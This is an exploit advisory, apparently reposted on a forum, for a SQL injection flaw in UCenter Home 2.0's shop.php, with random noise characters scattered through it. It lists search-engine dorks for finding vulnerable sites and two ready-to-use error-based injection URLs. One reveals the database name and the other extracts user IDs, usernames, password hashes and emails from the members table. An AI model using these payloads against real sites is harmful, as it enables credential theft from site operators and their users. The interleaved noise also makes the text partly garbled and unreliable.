( d6 ]5 c, M9 ^" e) v ~, b
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ 5 o0 K) n; A6 r3 Z
# p) ]' \" A; C& u $ ]7 _3 @( ~# L# ~+ A4 ?5 e2 h( n+ O
6 ? d5 _9 ]2 p9 ]( c
*/ Author : KnocKout 7 D: x+ Y! b" U; b5 T) L
* ?$ I$ r- ?0 P5 P4 w*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
; A2 X. m* t% e c: H
6 A% M+ F! O6 A5 s7 S; k5 y0 j*/ Contact: knockoutr@msn.com
. D( n: U: O" @3 |- B* m4 y4 R3 x; E- M! Q; y# C/ S2 o
*/ Cyber-Warrior.org/CWKnocKout
1 F5 H0 i6 c: Y( l. @ V8 {: |( z( p, P& S! a M$ e
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 r; B M1 N5 P2 r! q+ }! ?: H7 Z
Script : UCenter Home " p' `6 ]* w! G3 ~# Y# `0 E' D( ?
6 d. b ]2 @$ y. W1 WVersion : 2.0
% l9 w1 e1 F X3 O& A- u y6 A3 G/ O+ X. V
Script HomePage : http://u.discuz.net/ , j6 I: n& \# a
9 r- {* E" c* {8 m+ \
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== - o; K4 `: y* S
% x/ k% Z" }2 Z: P9 l
Dork : Powered by UCenter inurl:shop.php?ac=view * l: q* |4 ~' [+ n8 u
0 \- b7 p* ~. mDork 2 : inurl:shop.php?ac=view&shopid=
, U. B- ` s0 V0 k" D+ R, l4 f1 i1 b0 h- x! m# Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & F0 y- m- D! X! M
/ T1 Z: {3 p) o" }: e0 D( X
Vuln file : Shop.php ; u% Z. Y! C* N# J, w
5 [+ n' @. S. i# y7 |6 Svalue's : (?)ac=view&shopid=
- e0 j) V- y! h0 M0 A5 K6 I3 W- W1 v/ y$ G4 H) P
Vulnerable Style : SQL Injection (MySQL Error Based)
% q) l& b5 Z2 n/ e! W0 F$ U& W, z8 G. N7 t& p7 x3 y
Need Metarials : Hex Conversion t, A& }( N, _. i+ }
; V$ b1 g5 ?' O6 g4 w+ U
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ) m9 Z- z; n$ W6 T( B X9 \. ?4 _
; ^& R: a6 v$ s. o
Your Need victim Database name. / w/ m$ j' J! W( X5 l6 @9 X5 Y
( [" D) O$ e' |) D
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ; T* R6 U3 a- \0 ?, L9 u. m; ^
% W6 \% L* s4 \+ k7 `- r) _7 U" b.. & \+ g8 d: Z# G
/ U% V, y: F1 SDB : Okey.
4 y# s' @' k! ]5 J, w$ G) n- s3 j0 o6 u4 `+ e* S; z; _
your edit DB `[TARGET DB NAME]` - T7 Z- k) e4 x0 D# D
/ g: g" }0 ^* H [; n/ ^3 c: S
Example : 'hiwir1_ucenter'
% f a& }2 V; X% [1 ?* ~0 z; L" r6 p& p! I7 J! v0 H/ t6 H
Edit : Okey.
8 n$ N# d) ~- b" w7 c( F+ P
7 M! ]: Y* O# }6 p8 i4 tYour use Hex conversion. And edit Your SQL Injection Exploit..
1 l* U) l8 {$ s4 a$ \- z0 i8 [) Q
& t, Z6 z7 [4 O; H& Y " M4 [; w$ \8 e1 L- e* {
5 h9 e6 ~: `; v$ Z" B, Y, J
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
3 p' F* ~0 W- F; @% n |
发表于 2013-2-27 21:31:31
收藏
支持
反对